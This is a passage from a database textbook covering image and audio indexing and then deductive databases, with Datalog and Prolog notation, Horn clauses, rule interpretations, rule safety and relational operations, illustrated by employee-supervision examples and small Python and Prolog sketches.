features based on the Euclidean distance of their feature vectors. Since the keypoint
features are highly distinctive, a single feature can be correctly matched with good
probability in a large database of features.

In addition to SIFT, there are a number of competing methods available for object
recognition under clutter or partial occlusion. For example, RIFT, a
rotation-invariant generalization of SIFT, identifies groups of local affine regions
(image features having a characteristic appearance and elliptical shape) that remain
approximately affinely rigid across a range of views of an object, and across
multiple instances of the same object class.

30See Lowe (2004), “Distinctive Image Features from Scale-Invariant Keypoints.”

4.3 Semantic Tagging of Images
The notion of implicit tagging is an important one for image recognition and
comparison. Multiple tags may attach to an image or a subimage: for instance, in
the example we referred to above, tags such as “tiger,” “jungle,” “green,” and
“stripes” may be associated with that image. Most image search techniques retrieve
images based on user-supplied tags that are often not very accurate or
comprehensive. To improve search quality, a number of recent systems aim at
automated generation of these image tags. In the case of multimedia data, most of
its semantics is present in its content. These systems use image-processing and
statistical-modeling techniques to analyze image content to generate accurate
annotation tags that can then be used to retrieve images by content. Since different
annotation schemes will use different vocabularies to annotate images, the quality
of image retrieval will be poor.
To solve this problem, recent research techniques have proposed the use of concept
hierarchies, taxonomies, or ontologies using OWL (Web Ontology Language), in
which terms and their relationships are clearly defined. These can be used to infer
higher-level concepts based on tags. Concepts like “sky” and “grass” may be further
divided into “clear sky” and “cloudy sky” or “dry grass” and “green grass” in such a
taxonomy. These approaches generally come under semantic tagging and can be
used in conjunction with the above feature-analysis and object-identification
strategies.

4.4 Analysis of Audio Data Sources
Audio sources are broadly classified into speech, music, and other audio data. Each
of these is significantly different from the others; hence different types of audio
data are treated differently. Audio data must be digitized before it can be processed
and stored. Indexing and retrieval of audio data is arguably the toughest among all
types of media, because like video, it is continuous in time and does not have easily
measurable characteristics such as text. Clarity of sound recordings is easy to
perceive humanly but is hard to quantify for machine learning. Interestingly,
speech data often uses speech recognition techniques to aid the actual audio
content, as this can make indexing this data a lot easier and more accurate. This is
sometimes referred to as text-based indexing of audio data. The speech metadata is
typically content dependent, in that the metadata is generated from the audio
content, for example, the length of the speech, the number of speakers, and so on.
However, some of the metadata might be independent of the actual content, such
as the length of the speech and the format in which the data is stored.

Music indexing, on the other hand, is done based on the statistical analysis of the
audio signal, also known as content-based indexing. Content-based indexing often
makes use of the key features of sound: intensity, pitch, timbre, and rhythm. It is
possible to compare different pieces of audio data and retrieve information from
them based on the calculation of certain features, as well as application of certain
transforms.

5 Introduction to Deductive Databases

5.1 Overview of Deductive Databases
In a deductive database system we typically specify rules through a declarative
language—a language in which we specify what to achieve rather than how to
achieve it. An inference engine (or deduction mechanism) within the system can
deduce new facts from the database by interpreting these rules. The model used for
deductive databases is closely related to the relational data model, and particularly
to the domain relational calculus formalism. It is also related to the field of logic
programming and the Prolog language. The deductive database work based on
logic has used Prolog as a starting point. A variation of Prolog called Datalog is
used to define rules declaratively in conjunction with an existing set of relations,
which are themselves treated as literals in the language. Although the language
structure of Datalog resembles that of Prolog, its operational semantics—that is,
how a Datalog program is executed—is still different.

A deductive database uses two main types of specifications: facts and rules. Facts
are specified in a manner similar to the way relations are specified, except that it is
not necessary to include the attribute names.
Recall that a tuple in a relation describes some real-world fact whose meaning is
partly determined by the attribute names. In a deductive database, the meaning of
an attribute value in a tuple is determined solely by its position within the tuple.
Rules are somewhat similar to relational views. They specify virtual relations that
are not actually stored but that can be formed from the facts by applying inference
mechanisms based on the rule specifications. The main difference between rules
and views is that rules may involve recursion and hence may yield virtual relations
that cannot be defined in terms of basic relational views.

The evaluation of Prolog programs is based on a technique called backward
chaining, which involves a top-down evaluation of goals. In the deductive
databases that use Datalog, attention has been devoted to handling large volumes
of data stored in a relational database. Hence, evaluation techniques have been
devised that resemble those for a bottom-up evaluation. Prolog suffers from the
limitation that the order of specification of facts and rules is significant in
evaluation; moreover, the order of literals (defined in Section 5.3) within a rule is
significant. The execution techniques for Datalog programs attempt to circumvent
these problems.

5.2 Prolog/Datalog Notation
The notation used in Prolog/Datalog is based on providing predicates with unique
names. A predicate has an implicit meaning, which is suggested by the predicate
name, and a fixed number of arguments. If the arguments are all constant values,
the predicate simply states that a certain fact is true. If, on the other hand, the
predicate has variables as arguments, it is either considered as a query or as part of
a rule or constraint. In our discussion, we adopt the Prolog convention that all
constant values in a predicate are either numeric or character strings; they are
represented as identifiers (or names) that start with a lowercase letter, whereas
variable names always start with an uppercase letter.

Figure 11
(a) Prolog notation. (b) The supervisory tree.

Facts
SUPERVISE(franklin, john).
SUPERVISE(franklin, ramesh).
SUPERVISE(franklin, joyce).
SUPERVISE(jennifer, alicia).
SUPERVISE(jennifer, ahmad).
SUPERVISE(james, franklin).
SUPERVISE(james, jennifer).
. . .

Rules
SUPERIOR(X, Y ) :– SUPERVISE(X, Y ).
SUPERIOR(X, Y ) :– SUPERVISE(X, Z ), SUPERIOR(Z, Y ).
SUBORDINATE(X, Y ) :– SUPERIOR(Y, X ).

Queries
SUPERIOR(james, Y )?
SUPERIOR(james, joyce)?

Consider the example shown in Figure 11, which is based on the relational
database in Figure A.1 (in Appendix: Figures at the end of this chapter), but in a
much simplified form. There are three predicate names: supervise, superior, and
subordinate. The SUPERVISE predicate is defined via a set of facts, each of which
has two arguments: a supervisor name, followed by the name of a direct supervisee
(subordinate) of that supervisor. These facts correspond to the actual data that is
stored in the database, and they can be considered as constituting a set of tuples in
a relation SUPERVISE with two attributes whose schema is

SUPERVISE(Supervisor, Supervisee)

Thus, SUPERVISE(X, Y ) states the fact that X supervises Y. Notice the omission of
the attribute names in the Prolog notation.
Attribute names are only represented by virtue of the position of each argument in
a predicate: the first argument represents the supervisor, and the second argument
represents a direct subordinate.

The other two predicate names are defined by rules. The main contributions of
deductive databases are the ability to specify recursive rules and to provide a
framework for inferring new information based on the specified rules. A rule is of
the form head :– body, where :– is read as if and only if. A rule usually has a single
predicate to the left of the :– symbol—called the head or left-hand side (LHS) or
conclusion of the rule—and one or more predicates to the right of the :– symbol—
called the body or right-hand side (RHS) or premise(s) of the rule.

A predicate with constants as arguments is said to be ground; we also refer to it as
an instantiated predicate. The arguments of the predicates that appear in a rule
typically include a number of variable symbols, although predicates can also
contain constants as arguments. A rule specifies that, if a particular assignment or
binding of constant values to the variables in the body (RHS predicates) makes all
the RHS predicates true, it also makes the head (LHS predicate) true by using the
same assignment of constant values to variables. Hence, a rule provides us with a
way of generating new facts that are instantiations of the head of the rule. These
new facts are based on facts that already exist, corresponding to the instantiations
(or bindings) of predicates in the body of the rule. Notice that by listing multiple
predicates in the body of a rule we implicitly apply the logical AND operator to
these predicates. Hence, the commas between the RHS predicates may be read as
meaning and.

Consider the definition of the predicate SUPERIOR in Figure 11, whose first
argument is an employee name and whose second argument is an employee who is
either a direct or an indirect subordinate of the first employee. By indirect
subordinate, we mean the subordinate of some subordinate down to any number
of levels. Thus SUPERIOR(X, Y) stands for the fact that X is a superior of Y
through direct or indirect supervision. We can write two rules that together specify
the meaning of the new predicate. The first rule under Rules in the figure states
that for every value of X and Y, if SUPERVISE(X, Y)—the rule body—is true, then
SUPERIOR(X, Y)—the rule head—is also true, since Y would be a direct
subordinate of X (at one level down). This rule can be used to generate all direct
superior/subordinate relationships from the facts that define the SUPERVISE
predicate. The second recursive rule states that if SUPERVISE(X, Z) and
SUPERIOR(Z, Y) are both true, then SUPERIOR(X, Y) is also true. This is an
example of a recursive rule, where one of the rule body predicates in the RHS is the
same as the rule head predicate in the LHS. In general, the rule body defines a
number of premises such that if they are all true, we can deduce that the
conclusion in the rule head is also true. Notice that if we have two (or more) rules
with the same head (LHS predicate), it is equivalent to saying that the predicate is
true (that is, that it can be instantiated) if either one of the bodies is true; hence, it
is equivalent to a logical OR operation. For example, if we have two rules X :– Y
and X :– Z, they are equivalent to a rule X :– Y OR Z.
The latter form is not used in deductive systems, however, because it is not in the
standard form of rule, called a Horn clause, as we discuss in Section 5.4.

A Prolog system contains a number of built-in predicates that the system can
interpret directly. These typically include the equality comparison operator =(X, Y),
which returns true if X and Y are identical and can also be written as X=Y by using
the standard infix notation.31 Other comparison operators for numbers, such as <,
<=, >, and >=, can be treated as binary predicates. Arithmetic functions such as +,
–, *, and / can be used as arguments in predicates in Prolog. In contrast, Datalog (in
its basic form) does not allow functions such as arithmetic operations as arguments;
indeed, this is one of the main differences between Prolog and Datalog. However,
extensions to Datalog have been proposed that do include functions.

31A Prolog system typically has a number of different equality predicates that have different interpreta-
tions.


A query typically involves a predicate symbol with some variable arguments, and its
meaning (or answer) is to deduce all the different constant combinations that, when
bound (assigned) to the variables, can make the predicate true. For example, the
first query in Figure 11 requests the names of all subordinates of james at any level.
A different type of query, which has only constant symbols as arguments, returns
either a true or a false result, depending on whether the arguments provided can be
deduced from the facts and rules. For example, the second query in Figure 11
returns true, since SUPERIOR(james, joyce) can be deduced.
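
A rough sketch of answering such queries bottom-up, with the SUPERVISE facts and the two SUPERIOR rules of Figure 11 hard-coded in Python; a real Datalog engine would, of course, work from arbitrary rules rather than a hand-written loop.

supervise = {('franklin', 'john'), ('franklin', 'ramesh'), ('franklin', 'joyce'),
             ('jennifer', 'alicia'), ('jennifer', 'ahmad'),
             ('james', 'franklin'), ('james', 'jennifer')}

# Bottom-up (naive) evaluation: apply the two SUPERIOR rules until no new facts appear.
superior = set(supervise)              # rule 1: SUPERIOR(X,Y) :- SUPERVISE(X,Y).
changed = True
while changed:
    changed = False
    for (x, z) in supervise:           # rule 2: SUPERIOR(X,Y) :- SUPERVISE(X,Z), SUPERIOR(Z,Y).
        for (z2, y) in list(superior):
            if z == z2 and (x, y) not in superior:
                superior.add((x, y))
                changed = True

print(sorted(y for (x, y) in superior if x == 'james'))   # SUPERIOR(james, Y)?
print(('james', 'joyce') in superior)                     # SUPERIOR(james, joyce)? -> True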

5.3 Datalog Notation
In Datalog, as in other logic-based languages, a program is built from basic objects
called atomic formulas. It is customary to define the syntax of logic-based lan-
guages by describing the syntax of atomic formulas and identifying how they can be
combined to form a program. In Datalog, atomic formulas are literals of the form
p(a1, a2, …, an), where p is the predicate name and n is the number of arguments for
predicate p. Different predicate symbols can have different numbers of arguments,
and the number of arguments n of predicate p is sometimes called the arity or
degree of p. The arguments can be either constant values or variable names. As
mentioned earlier, we use the convention that constant values either are numeric or
start with a lowercase character, whereas variable names always start with an
uppercase character.
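
One simple way to mirror this convention in code is to represent an atomic formula as a predicate name plus an argument tuple and to use the capitalization rule to tell variables from constants; the representation below is a toy sketch, not any standard Datalog API.

def is_variable(term):
    # Prolog/Datalog convention: variables start with an uppercase letter,
    # constants are numbers or identifiers starting with a lowercase letter.
    return isinstance(term, str) and term[:1].isupper()

def atom(predicate, *args):
    return (predicate, args)

fact = atom('supervise', 'james', 'franklin')   # ground: all arguments are constants
query = atom('superior', 'james', 'Y')          # contains the variable Y

def is_ground(a):
    _, args = a
    return not any(is_variable(t) for t in args)

print(is_ground(fact), is_ground(query))     # True False
print(query[0], 'has arity', len(query[1]))  # superior has arity 2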

A number of built-in predicates are included in Datalog, which can also be used to
construct atomic formulas. The built-in predicates are of two main types: the binary
comparison predicates < (less), <= (less_or_equal), > (greater), and >=
(greater_or_equal) over ordered domains; and the comparison predicates = (equal)
and /= (not_equal) over ordered or unordered domains. These can be used as binary
predicates with the same functional syntax as other predicates—for example, by
writing less(X, 3)—or they can be specified by using the customary infix notation
X<3. Note that because the domains of these predicates are potentially infinite, they should be used with care in rule definitions. For example, the predicate greater(X, 3), if used alone, generates an infinite set of values for X that satisfy the predicate (all integer numbers greater than 3).

A literal is either an atomic formula as defined earlier—called a positive literal—or an atomic formula preceded by not. The latter is a negated atomic formula, called a negative literal. Datalog programs can be considered to be a subset of the predicate calculus formulas, which are somewhat similar to the formulas of the domain relational calculus. In Datalog, however, these formulas are first converted into what is known as clausal form before they are expressed in Datalog, and only formulas given in a restricted clausal form, called Horn clauses,32 can be used in Datalog.

32Named after the mathematician Alfred Horn.

5.4 Clausal Form and Horn Clauses
Recall that a formula in the relational calculus is a condition that includes predicates called atoms (based on relation names). Additionally, a formula can have quantifiers—namely, the universal quantifier (for all) and the existential quantifier (there exists). In clausal form, a formula must be transformed into another formula with the following characteristics:

■ All variables in the formula are universally quantified. Hence, it is not necessary to include the universal quantifiers (for all) explicitly; the quantifiers are removed, and all variables in the formula are implicitly quantified by the universal quantifier.

■ In clausal form, the formula is made up of a number of clauses, where each clause is composed of a number of literals connected by OR logical connectives only. Hence, each clause is a disjunction of literals.

■ The clauses themselves are connected by AND logical connectives only, to form a formula. Hence, the clausal form of a formula is a conjunction of clauses.

It can be shown that any formula can be converted into clausal form. For our purposes, we are mainly interested in the form of the individual clauses, each of which is a disjunction of literals. Recall that literals can be positive literals or negative literals. Consider a clause of the form:

NOT(P1) OR NOT(P2) OR ... OR NOT(Pn) OR Q1 OR Q2 OR ... OR Qm    (1)

This clause has n negative literals and m positive literals. Such a clause can be transformed into the following equivalent logical formula:

P1 AND P2 AND ... AND Pn ⇒ Q1 OR Q2 OR ... OR Qm    (2)

where ⇒ is the implies symbol. The formulas (1) and (2) are equivalent, meaning that their truth values are always the same. This is the case because if all the Pi literals (i = 1, 2, ..., n) are true, the formula (2) is true only if at least one of the Qi's is true, which is the meaning of the ⇒ (implies) symbol. For formula (1), if all the Pi literals (i = 1, 2, ..., n) are true, their negations are all false; so in this case formula (1) is true only if at least one of the Qi's is true.

In Datalog, rules are expressed as a restricted form of clauses called Horn clauses, in which a clause can contain at most one positive literal. Hence, a Horn clause is either of the form

NOT(P1) OR NOT(P2) OR ... OR NOT(Pn) OR Q    (3)

or of the form

NOT(P1) OR NOT(P2) OR ... OR NOT(Pn)    (4)

The Horn clause in (3) can be transformed into the clause

P1 AND P2 AND ... AND Pn ⇒ Q    (5)

which is written in Datalog as the following rule:

Q :– P1, P2, ..., Pn.    (6)
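
For example, the recursive rule of Figure 11, SUPERIOR(X, Y) :– SUPERVISE(X, Z), SUPERIOR(Z, Y), corresponds to the Horn clause

NOT(SUPERVISE(X, Z)) OR NOT(SUPERIOR(Z, Y)) OR SUPERIOR(X, Y)

which, by the transformation of (3) into (5), is equivalent to SUPERVISE(X, Z) AND SUPERIOR(Z, Y) ⇒ SUPERIOR(X, Y).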
1. SUPERIOR(X, Y) :– SUPERVISE(X, Y). (rule 1)
2. SUPERIOR(X, Y) :– SUPERVISE(X, Z), SUPERIOR(Z, Y). (rule 2)
3. SUPERVISE(jennifer, ahmad). (ground axiom, given)
4. SUPERVISE(james, jennifer). (ground axiom, given)
5. SUPERIOR(jennifer, ahmad). (apply rule 1 on 3)
6. SUPERIOR(james, ahmad). (apply rule 2 on 4 and 5)

Figure 12
Proving a new fact.

The Horn clause in (4) can be transformed into

P1 AND P2 AND ... AND Pn ⇒    (7)

which is written in Datalog as follows:

P1, P2, ..., Pn.    (8)

A Datalog rule, as in (6), is hence a Horn clause, and its meaning, based on formula (5), is that if the predicates P1 AND P2 AND ... AND Pn are all true for a particular binding to their variable arguments, then Q is also true and can hence be inferred. The Datalog expression (8) can be considered as an integrity constraint, where all the predicates must be true to satisfy the query.

In general, a query in Datalog consists of two components:

■ A Datalog program, which is a finite set of rules
■ A literal P(X1, X2, ..., Xn), where each Xi is a variable or a constant

A Prolog or Datalog system has an internal inference engine that can be used to process and compute the results of such queries. Prolog inference engines typically return one result to the query (that is, one set of values for the variables in the query) at a time and must be prompted to return additional results. In contrast, Datalog returns results set-at-a-time.

5.5 Interpretations of Rules
There are two main alternatives for interpreting the theoretical meaning of rules: proof-theoretic and model-theoretic. In practical systems, the inference mechanism within a system defines the exact interpretation, which may not coincide with either of the two theoretical interpretations. The inference mechanism is a computational procedure and hence provides a computational interpretation of the meaning of rules. In this section, first we discuss the two theoretical interpretations. Then we briefly discuss inference mechanisms as a way of defining the meaning of rules.

In the proof-theoretic interpretation of rules, we consider the facts and rules to be true statements, or axioms. Ground axioms contain no variables. The facts are ground axioms that are given to be true. Rules are called deductive axioms, since they can be used to deduce new facts. The deductive axioms can be used to construct proofs that derive new facts from existing facts. For example, Figure 12 shows how to prove the fact SUPERIOR(james, ahmad) from the rules and facts given in Figure 11. The proof-theoretic interpretation gives us a procedural or computational approach for computing an answer to the Datalog query. The process of proving whether a certain fact (theorem) holds is known as theorem proving.

The second type of interpretation is called the model-theoretic interpretation. Here, given a finite or an infinite domain of constant values,33 we assign to a predicate every possible combination of values as arguments. We must then determine whether the predicate is true or false. In general, it is sufficient to specify the combinations of arguments that make the predicate true, and to state that all other combinations make the predicate false. If this is done for every predicate, it is called an interpretation of the set of predicates. For example, consider the interpretation shown in Figure 13 for the predicates SUPERVISE and SUPERIOR.
This interpretation assigns a truth value (true or false) to every possible combination of argument values (from a finite domain) for the two predicates.

An interpretation is called a model for a specific set of rules if those rules are always true under that interpretation; that is, for any values assigned to the variables in the rules, the head of the rules is true when we substitute the truth values assigned to the predicates in the body of the rule by that interpretation. Hence, whenever a particular substitution (binding) to the variables in the rules is applied, if all the predicates in the body of a rule are true under the interpretation, the predicate in the head of the rule must also be true. The interpretation shown in Figure 13 is a model for the two rules shown, since it can never cause the rules to be violated. Notice that a rule is violated if a particular binding of constants to the variables makes all the predicates in the rule body true but makes the predicate in the rule head false. For example, if SUPERVISE(a, b) and SUPERIOR(b, c) are both true under some interpretation, but SUPERIOR(a, c) is not true, the interpretation cannot be a model for the recursive rule:

SUPERIOR(X, Y) :– SUPERVISE(X, Z), SUPERIOR(Z, Y)

In the model-theoretic approach, the meaning of the rules is established by providing a model for these rules. A model is called a minimal model for a set of rules if we cannot change any fact from true to false and still get a model for these rules. For example, consider the interpretation in Figure 13, and assume that the SUPERVISE predicate is defined by a set of known facts, whereas the SUPERIOR predicate is defined as an interpretation (model) for the rules. Suppose that we add the predicate SUPERIOR(james, bob) to the true predicates. This remains a model for the rules shown, but it is not a minimal model, since changing the truth value of SUPERIOR(james, bob) from true to false still provides us with a model for the rules. The model shown in Figure 13 is the minimal model for the set of facts that are defined by the SUPERVISE predicate.

33The most commonly chosen domain is finite and is called the Herbrand Universe.

Rules
SUPERIOR(X, Y) :– SUPERVISE(X, Y).
SUPERIOR(X, Y) :– SUPERVISE(X, Z), SUPERIOR(Z, Y).

Interpretation
Known Facts:
SUPERVISE(franklin, john) is true.
SUPERVISE(franklin, ramesh) is true.
SUPERVISE(franklin, joyce) is true.
SUPERVISE(jennifer, alicia) is true.
SUPERVISE(jennifer, ahmad) is true.
SUPERVISE(james, franklin) is true.
SUPERVISE(james, jennifer) is true.
SUPERVISE(X, Y) is false for all other possible (X, Y) combinations.

Derived Facts:
SUPERIOR(franklin, john) is true.
SUPERIOR(franklin, ramesh) is true.
SUPERIOR(franklin, joyce) is true.
SUPERIOR(jennifer, alicia) is true.
SUPERIOR(jennifer, ahmad) is true.
SUPERIOR(james, franklin) is true.
SUPERIOR(james, jennifer) is true.
SUPERIOR(james, john) is true.
SUPERIOR(james, ramesh) is true.
SUPERIOR(james, joyce) is true.
SUPERIOR(james, alicia) is true.
SUPERIOR(james, ahmad) is true.
SUPERIOR(X, Y) is false for all other possible (X, Y) combinations.

Figure 13
An interpretation that is a minimal model.

In general, the minimal model that corresponds to a given set of facts in the model-theoretic interpretation should be the same as the facts generated by the proof-theoretic interpretation for the same original set of ground and deductive axioms.
However, this is generally true only for rules with a simple structure. Once we allow negation in the specification of rules, the correspondence between interpretations does not hold. In fact, with negation, numerous minimal models are possible for a given set of facts.

A third approach to interpreting the meaning of rules involves defining an inference mechanism that is used by the system to deduce facts from the rules. This inference mechanism would define a computational interpretation to the meaning of the rules. The Prolog logic programming language uses its inference mechanism to define the meaning of the rules and facts in a Prolog program. Not all Prolog programs correspond to the proof-theoretic or model-theoretic interpretations; it depends on the type of rules in the program. However, for many simple Prolog programs, the Prolog inference mechanism infers the facts that correspond either to the proof-theoretic interpretation or to a minimal model under the model-theoretic interpretation.

EMPLOYEE(john). EMPLOYEE(franklin). EMPLOYEE(alicia). EMPLOYEE(jennifer). EMPLOYEE(ramesh). EMPLOYEE(joyce). EMPLOYEE(ahmad). EMPLOYEE(james).
MALE(john). MALE(franklin). MALE(ramesh). MALE(ahmad). MALE(james).
FEMALE(alicia). FEMALE(jennifer). FEMALE(joyce).
SALARY(john, 30000). SALARY(franklin, 40000). SALARY(alicia, 25000). SALARY(jennifer, 43000). SALARY(ramesh, 38000). SALARY(joyce, 25000). SALARY(ahmad, 25000). SALARY(james, 55000).
DEPARTMENT(john, research). DEPARTMENT(franklin, research). DEPARTMENT(alicia, administration). DEPARTMENT(jennifer, administration). DEPARTMENT(ramesh, research). DEPARTMENT(joyce, research). DEPARTMENT(ahmad, administration). DEPARTMENT(james, headquarters).
SUPERVISE(franklin, john). SUPERVISE(franklin, ramesh). SUPERVISE(franklin, joyce). SUPERVISE(jennifer, alicia). SUPERVISE(jennifer, ahmad). SUPERVISE(james, franklin). SUPERVISE(james, jennifer).
PROJECT(productx). PROJECT(producty). PROJECT(productz). PROJECT(computerization). PROJECT(reorganization). PROJECT(newbenefits).
WORKS_ON(john, productx, 32). WORKS_ON(john, producty, 8). WORKS_ON(ramesh, productz, 40). WORKS_ON(joyce, productx, 20). WORKS_ON(joyce, producty, 20). WORKS_ON(franklin, producty, 10). WORKS_ON(franklin, productz, 10). WORKS_ON(franklin, computerization, 10). WORKS_ON(franklin, reorganization, 10). WORKS_ON(alicia, newbenefits, 30). WORKS_ON(alicia, computerization, 10). WORKS_ON(ahmad, computerization, 35). WORKS_ON(ahmad, newbenefits, 5). WORKS_ON(jennifer, newbenefits, 20). WORKS_ON(jennifer, reorganization, 15). WORKS_ON(james, reorganization, 10).

Figure 14
Fact predicates for part of the database from Figure A.1.

5.6 Datalog Programs and Their Safety
There are two main methods of defining the truth values of predicates in actual Datalog programs. Fact-defined predicates (or relations) are defined by listing all the combinations of values (the tuples) that make the predicate true. These correspond to base relations whose contents are stored in a database system. Figure 14 shows the fact-defined predicates EMPLOYEE, MALE, FEMALE, SALARY, DEPARTMENT, SUPERVISE, PROJECT, and WORKS_ON, which correspond to part of the relational database shown in Figure A.1. Rule-defined predicates (or views) are defined by being the head (LHS) of one or more Datalog rules; they correspond to virtual relations whose contents can be inferred by the inference engine. Figure 15 shows a number of rule-defined predicates.

SUPERIOR(X, Y) :– SUPERVISE(X, Y).
SUPERIOR(X, Y) :– SUPERVISE(X, Z), SUPERIOR(Z, Y).
SUBORDINATE(X, Y) :– SUPERIOR(Y, X).
SUPERVISOR(X) :– EMPLOYEE(X), SUPERVISE(X, Y).
OVER_40K_EMP(X) :– EMPLOYEE(X), SALARY(X, Y), Y >= 40000.
UNDER_40K_SUPERVISOR(X) :– SUPERVISOR(X), NOT(OVER_40K_EMP(X)).
MAIN_PRODUCTX_EMP(X) :– EMPLOYEE(X), WORKS_ON(X, productx, Y), Y >= 20.
PRESIDENT(X) :– EMPLOYEE(X), NOT(SUPERVISE(Y, X)).

Figure 15
Rule-defined predicates.

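
Rules such as those in Figure 15 can be written almost verbatim for a Prolog system. The sketch below (not from the text) uses standard Prolog syntax, with lowercase predicate and constant names and with NOT expressed as the negation-as-failure operator \+, and it assumes the facts of Figure 14 are loaded in the same lowercase form.

supervisor(X) :- employee(X), supervise(X, _).
over_40k_emp(X) :- employee(X), salary(X, S), S >= 40000.
under_40k_supervisor(X) :- supervisor(X), \+ over_40k_emp(X).
president(X) :- employee(X), \+ supervise(_, X).

% With the facts of Figure 14, the query ?- president(X). yields X = james,
% the only employee who never appears as the second argument of SUPERVISE.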

A program or a rule is said to be safe if it generates a finite set of facts. The general
theoretical problem of determining whether a set of rules is safe is undecidable.
However, one can determine the safety of restricted forms of rules. For example, the
rules shown in Figure 16 are safe. One situation where we get unsafe rules that can
generate an infinite number of facts arises when one of the variables in the rule can
range over an infinite domain of values, and that variable is not limited to ranging
over a finite relation. For example, consider the following rule:

BIG_SALARY(Y ) :– Y>60000

Here, we can get an infinite result if Y ranges over all possible integers. But suppose
that we change the rule as follows:

BIG_SALARY(Y) :– EMPLOYEE(X), SALARY(X, Y), Y>60000

In the second rule, the result is not infinite, since the values that Y can be bound to
are now restricted to values that are the salary of some employee in the database—
presumably, a finite set of values. We can also rewrite the rule as follows:

BIG_SALARY(Y) :– Y>60000, EMPLOYEE(X), SALARY(X, Y)

In this case, the rule is still theoretically safe. However, in Prolog or any other system
that uses a top-down, depth-first inference mechanism, the rule creates an infinite
loop, since we first search for a value for Y and then check whether it is a salary of an
employee. The result is generation of an infinite number of Y values, even though
these, after a certain point, cannot lead to a set of true RHS predicates. One defini-
tion of Datalog considers both rules to be safe, since it does not depend on a partic-
ular inference mechanism. Nonetheless, it is generally advisable to write such a rule
in the safest form, with the predicates that restrict possible bindings of variables
placed first. As another example of an unsafe rule, consider the following rule:

HAS_SOMETHING(X, Y ) :– EMPLOYEE(X )


REL_ONE(A, B, C ).
REL_TWO(D, E, F ).
REL_THREE(G, H, I, J ).

SELECT_ONE_A_EQ_C(X, Y, X) :– REL_ONE(X, Y, X).
SELECT_ONE_B_LESS_5(X, Y, Z) :– REL_ONE(X, Y, Z), Y<5.
SELECT_ONE_A_EQ_C_AND_B_LESS_5(X, Y, X) :– REL_ONE(X, Y, X), Y<5.
SELECT_ONE_A_EQ_C_OR_B_LESS_5(X, Y, X) :– REL_ONE(X, Y, X).
SELECT_ONE_A_EQ_C_OR_B_LESS_5(X, Y, Z) :– REL_ONE(X, Y, Z), Y<5.

PROJECT_THREE_ON_G_H(W, X) :– REL_THREE(W, X, Y, Z).

UNION_ONE_TWO(X, Y, Z) :– REL_ONE(X, Y, Z).
UNION_ONE_TWO(X, Y, Z) :– REL_TWO(X, Y, Z).

INTERSECT_ONE_TWO(X, Y, Z) :– REL_ONE(X, Y, Z), REL_TWO(X, Y, Z).

DIFFERENCE_TWO_ONE(X, Y, Z) :– REL_TWO(X, Y, Z), NOT(REL_ONE(X, Y, Z)).

CART_PROD_ONE_THREE(T, U, V, W, X, Y, Z) :– REL_ONE(T, U, V), REL_THREE(W, X, Y, Z).

NATURAL_JOIN_ONE_THREE_C_EQ_G(U, V, W, X, Y, Z) :– REL_ONE(U, V, W), REL_THREE(W, X, Y, Z).

Figure 16
Predicates for illustrating relational operations.

Here, an infinite number of Y values can again be generated, since the variable Y appears only in the head of the rule and hence is not limited to a finite set of values. To define safe rules more formally, we use the concept of a limited variable. A variable X is limited in a rule if (1) it appears in a regular (not built-in) predicate in the body of the rule; (2) it appears in a predicate of the form X=c or c=X or (c1<=X and X<=c2) in the rule body, where c, c1, and c2 are constant values; or (3) it appears in a predicate of the form X=Y or Y=X in the rule body, where Y is a limited variable. A rule is said to be safe if all its variables are limited.

5.7 Use of Relational Operations
It is straightforward to specify many operations of the relational algebra in the form of Datalog rules that define the result of applying these operations on the database relations (fact predicates). This means that relational queries and views can easily be specified in Datalog. The additional power that Datalog provides is in the specification of recursive queries, and views based on recursive queries. In this section, we show how some of the standard relational operations can be specified as Datalog rules. Our examples will use the base relations (fact-defined predicates) REL_ONE, REL_TWO, and REL_THREE, whose schemas are shown in Figure 16. In Datalog, we do not need to specify the attribute names as in Figure 16; rather, the arity (degree) of each predicate is the important aspect. In a practical system, the domain (data type) of each attribute is also important for operations such as UNION, INTERSECTION, and JOIN, and we assume that the attribute types are compatible for the various operations.

Figure 16 illustrates a number of basic relational operations. Notice that if the Datalog model is based on the relational model and hence assumes that predicates (fact relations and query results) specify sets of tuples, duplicate tuples in the same predicate are automatically eliminated. This may or may not be true, depending on the Datalog inference engine. However, it is definitely not the case in Prolog, so any of the rules in Figure 16 that involve duplicate elimination are not correct for Prolog. For example, if we want to specify Prolog rules for the UNION operation with duplicate elimination, we must rewrite them as follows:

UNION_ONE_TWO(X, Y, Z) :– REL_ONE(X, Y, Z).
UNION_ONE_TWO(X, Y, Z) :– REL_TWO(X, Y, Z), NOT(REL_ONE(X, Y, Z)).

However, the rules shown in Figure 16 should work for Datalog, if duplicates are automatically eliminated.
Similarly, the rules for the PROJECT operation shown in Figure 16 should work for Datalog in this case, but they are not correct for Prolog, since duplicates would appear in the latter case.

5.8 Evaluation of Nonrecursive Datalog Queries
In order to use Datalog as a deductive database system, it is appropriate to define an inference mechanism based on relational database query processing concepts. The inherent strategy involves a bottom-up evaluation, starting with base relations; the order of operations is kept flexible and subject to query optimization. In this section we discuss an inference mechanism based on relational operations that can be applied to nonrecursive Datalog queries. We use the fact and rule base shown in Figures 14 and 15 to illustrate our discussion.

If a query involves only fact-defined predicates, the inference becomes one of searching among the facts for the query result. For example, a query such as

DEPARTMENT(X, research)?

is a selection of all employee names X who work for the research department. In relational algebra, it is the query:

π$1 (σ$2 = "research" (DEPARTMENT))

which can be answered by searching through the fact-defined predicate DEPARTMENT(X, Y). The query involves relational SELECT and PROJECT operations on a base relation, and it can be handled by algorithmic database query processing and optimization techniques.

Figure 17
Predicate dependency graph for Figures 14 and 15, relating the fact-defined predicates EMPLOYEE, SALARY, SUPERVISE, DEPARTMENT, PROJECT, WORKS_ON, MALE, and FEMALE to the rule-defined predicates SUPERIOR, SUBORDINATE, SUPERVISOR, OVER_40K_EMP, UNDER_40K_SUPERVISOR, MAIN_PRODUCTX_EMP, and PRESIDENT.

